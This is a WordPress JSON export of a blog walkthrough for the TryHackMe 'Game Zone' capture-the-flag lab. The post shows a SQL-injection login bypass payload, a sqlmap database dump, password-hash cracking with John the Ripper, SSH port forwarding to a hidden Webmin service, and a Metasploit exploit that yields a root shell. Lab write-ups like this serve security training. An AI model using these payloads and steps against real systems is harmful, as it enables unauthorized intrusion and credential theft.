{"id":131304,"date":"2023-01-19T11:18:34","date_gmt":"2023-01-19T11:18:34","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1071170"},"modified":"2023-01-19T11:18:34","modified_gmt":"2023-01-19T11:18:34","slug":"tryhackme-game-zone-walkthrough","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/01\/19\/tryhackme-game-zone-walkthrough\/","title":{"rendered":"TryHackMe \u2013 Game Zone Walkthrough"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1071170&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-game-zone-walkthrough\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F9VbXoi9heZM%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<h2>CHALLENGE OVERVIEW<\/h2>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/gamezone\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/gamezone<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Easy<\/li>\n<li><strong>Target<\/strong>: user and root flags on a Linux server<\/li>\n<li><strong>Highlights<\/strong>: leveraging port forwarding to expose a webservice from behind a firewall, using <code>sqlmap<\/code> to find a username and hashed password<\/li>\n<li><strong>Tools used<\/strong>: <code>sqlmap<\/code>, <code>nmap<\/code>, <code>dirb<\/code>, <code>burpsuite<\/code>, <code>hydra<\/code>, <code>john the ripper<\/code>, <code>metasploit<\/code><\/li>\n<li><strong>Tags<\/strong>: <em>sqli, hashcracking, metasploit, ssh tunnel<\/em><\/li>\n<\/ul>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"372\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206-1024x372.png\" alt=\"\" class=\"wp-image-1071175\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206-1024x372.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206-300x109.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206-768x279.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-206.png 1344w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"684\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215-1024x684.png\" alt=\"\" class=\"wp-image-1071207\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215-1024x684.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215-768x513.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-215.png 1053w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website\u2019s server and finding a way to gain root privileges. Let\u2019s go!<\/p>\n<h2>IPs<\/h2>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export targetIP=10.10.163.79\nexport myIP=10.6.2.23<\/pre>\n<h2>ENUMERATION\/RECON<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"682\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216-1024x682.png\" alt=\"\" class=\"wp-image-1071212\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216-1024x682.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-216.png 1055w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s kick things off with our standard <code>nmap<\/code> and <code>dirb<\/code> scans. We\u2019ll let these run while we go ahead and walk the website looking for interesting leads.<\/p>\n<p>To find the character&#8217;s name on the main page, we can do a reverse image search on google. I\u2019ve played this title before but forgot his name, so I just googled \u201c<em>hitman game character name<\/em>\u201d to find the answer to our first question. (agent 47)<\/p>\n<h2>NMAP SCAN RESULTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"653\" height=\"535\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-207.png\" alt=\"\" class=\"wp-image-1071177\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-207.png 653w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-207-300x246.png 300w\" sizes=\"auto, (max-width: 653px) 100vw, 653px\" \/><\/figure>\n<\/div>\n<h2>DIRB SCAN RESULTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"479\" height=\"654\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-208.png\" alt=\"\" class=\"wp-image-1071178\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-208.png 479w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-208-220x300.png 220w\" sizes=\"auto, (max-width: 479px) 100vw, 479px\" \/><\/figure>\n<\/div>\n<h2>WALK THE WEBSITE<\/h2>\n<p>We see a login portal on the landing page of our target IP. We also look at the <code>\/images<\/code> folder that <code>dirb<\/code> found, but nothing remarkable is there at first glance.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"489\" height=\"543\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-209.png\" alt=\"\" class=\"wp-image-1071179\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-209.png 489w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-209-270x300.png 270w\" sizes=\"auto, (max-width: 489px) 100vw, 489px\" \/><\/figure>\n<\/div>\n<p>Due to a lack of proper data sanitization, we discover that the login can be bypassed by entering the following username and leaving the password blank:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">' or 1=1 -- -<\/pre>\n<p>The login trick works, and we are presented with a search box.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"484\" height=\"156\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-210.png\" alt=\"\" class=\"wp-image-1071180\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-210.png 484w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-210-300x97.png 300w\" sizes=\"auto, (max-width: 484px) 100vw, 484px\" \/><\/figure>\n<\/div>\n<h2>INITIAL FOOTHOLD &#8211; INTERCEPT A POST REQUEST WITH BURP<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"469\" height=\"703\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-218.png\" alt=\"\" class=\"wp-image-1071217\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-218.png 469w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-218-200x300.png 200w\" sizes=\"auto, (max-width: 469px) 100vw, 469px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s fire up <code>burpsuite<\/code> now to intercept an HTTP-post request made with this search box.<\/p>\n<p>Intercepted HTTP-post request:<\/p>\n<pre class=\"wp-block-preformatted\"><code>POST \/portal.php HTTP\/1.1\nHost: 10.10.134.32\nContent-Length: 17\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/10.10.134.32\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/105.0.5195.102 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/10.10.134.32\/portal.php\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5\nConnection: close searchitem=hitman<\/code>\n<\/pre>\n<p>We\u2019ll save this request in a file titled <code>req<\/code>. <\/p>\n<p>If you use <code>burpsuite<\/code> to capture the request, you can directly download it as a file. A word of caution: Using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the <code>sqlmap<\/code> command.\u00a0<\/p>\n<h2>USING SQLMAP TO EXTRACT THE FULL DATABASE\u00a0<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"684\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217-1024x684.png\" alt=\"\" class=\"wp-image-1071214\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217-1024x684.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217-768x513.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-217.png 1053w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>With the following command, we can instruct <code>sqlmap<\/code> to attempt to download (dump) the entire database and search for login username and hashed password.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sqlmap -r req --dbms=mysql --dump --level 5<\/pre>\n<p>It worked! We see that the database stores a list of game titles and reviews. <\/p>\n<p>The most interesting piece of information here is the password. It looks like a hashed password. We can use an online hash identifier program like hashes.com to find out the hash type.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">+------------------------------------------------------------------+----------+\n| pwd | username |\n+------------------------------------------------------------------+----------+\n| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"948\" height=\"427\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-211.png\" alt=\"\" class=\"wp-image-1071185\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-211.png 948w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-211-300x135.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-211-768x346.png 768w\" sizes=\"auto, (max-width: 948px) 100vw, 948px\" \/><\/figure>\n<\/div>\n<p>We can see that it is probably a SHA256 encrypted string. Now it\u2019s time to \u2026<\/p>\n<h2>CRACK THAT HASH WITH JOHN (THE RIPPER)!<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"682\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219-1024x682.png\" alt=\"\" class=\"wp-image-1071220\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219-1024x682.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-219.png 1055w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">john hash.txt --wordlist=\/home\/kalisurfer\/hacking-tools\/rockyou.txt --format=Raw-SHA256<\/pre>\n<p><code>rockyou.txt<\/code> is a legendary leaked database of passwords (14,344,391 passwords!)<\/p>\n<p>Output:<\/p>\n<pre class=\"wp-block-preformatted\"><code>Using default input encoding: UTF-8\nLoaded 1 password hash (Raw-SHA256 [SHA256 512\/512 AVX512BW 16x])\nWarning: poor OpenMP scalability for this hash type, consider --fork=4\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nvideogamer124\t(?)\n1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g\/s 4369Kp\/s 4369Kc\/s 4369KC\/s vimivera..tyler912\nUse the \"--show --format=Raw-SHA256\" options to display all of the cracked passwords reliably\nSession completed<\/code>\n<\/pre>\n<\/p>\n<h2>SSH INTO THE BOX AND GRAB THE USER FLAG<\/h2>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh agent47@10.10.151.6<\/pre>\n<p>We are in!<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">agent47@gamezone:~$ cat user.txt\n64\u2014---digits omitted\u2014--------5c\n<\/pre>\n<h2>PRIVILEGE ESCALATION<\/h2>\n<p>This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener. <\/p>\n<p>Let\u2019s check for hidden services running on ports that may be behind a firewall. We can use the ss utility to check out all of the data connections from each port on our target machine.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">agent47@gamezone:~$ ss -t -u -l -p -n<\/pre>\n<p>Output:<\/p>\n<pre class=\"wp-block-preformatted\"><code>Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port\nudp UNCONN 0 0 *:10000 *:*<\/code><\/pre>\n<p>This first line is curious. It appears that a service is running on port 10000 of the target system. <\/p>\n<p>Let\u2019s go ahead and port forward to see what is lying behind the firewall. Port 10000 is typically used for server tools and configuration services.<\/p>\n<h2>SET UP PORT FORWARD WITH SSH<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"469\" height=\"703\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-220.png\" alt=\"\" class=\"wp-image-1071221\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-220.png 469w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-220-200x300.png 200w\" sizes=\"auto, (max-width: 469px) 100vw, 469px\" \/><\/figure>\n<\/div>\n<p>The following command will activate port forwarding via ssh:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh -L 10000:localhost:10000 agent47@10.10.151.64\npassword: \u2014-cracked-password\u2014-\nWelcome to Ubuntu 16.04.6 LTS (GNU\/Linux 4.4.0-159-generic x86_64) * Documentation: https:\/\/help.ubuntu.com * Management: https:\/\/landscape.canonical.com * Support: https:\/\/ubuntu.com\/advantage 109 packages can be updated.\n68 updates are security updates. Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23\nagent47@gamezone:~$\n<\/pre>\n<p>We are connected now with port forwarding in place. Let\u2019s navigate in our browser to <code>http:\/\/$targetIP:10000<\/code><\/p>\n<p>After logging in with the same <code>username:password<\/code> combination we used with <code>ssh<\/code>, we are given access to a webmin portal.<\/p>\n<h2>PRIVESC WITH METASPLOIT<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"682\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221-1024x682.png\" alt=\"\" class=\"wp-image-1071223\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221-1024x682.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221-768x511.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-221.png 1056w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Searching for <code>webmin<\/code> in Metasploit brings up the following Metasploit module.<\/p>\n<p>Let\u2019s use it and set it up with the following options:<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"863\" height=\"608\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-212.png\" alt=\"\" class=\"wp-image-1071190\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-212.png 863w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-212-300x211.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-212-768x541.png 768w\" sizes=\"auto, (max-width: 863px) 100vw, 863px\" \/><\/figure>\n<\/div>\n<p>Let it rip!&nbsp;<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">run<\/pre>\n<p>And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sessions -i 0<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"383\" height=\"349\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-213.png\" alt=\"\" class=\"wp-image-1071191\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-213.png 383w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-213-300x273.png 300w\" sizes=\"auto, (max-width: 383px) 100vw, 383px\" \/><\/figure>\n<\/div>\n<p>And we now have our root flag! Thanks for reading this write-up.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW Link: https:\/\/tryhackme.com\/room\/gamezone Difficulty: Easy Target: user and root flags on a Linux server Highlights: leveraging port forwarding to expose a webservice from behind a firewall, using sqlmap to find a username and hashed password Tools used: sqlmap, nmap, dirb, burpsuite, hydra, john the ripper, metasploit Tags: sqli, hashcracking, metasploit, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131304","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131304"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131304\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}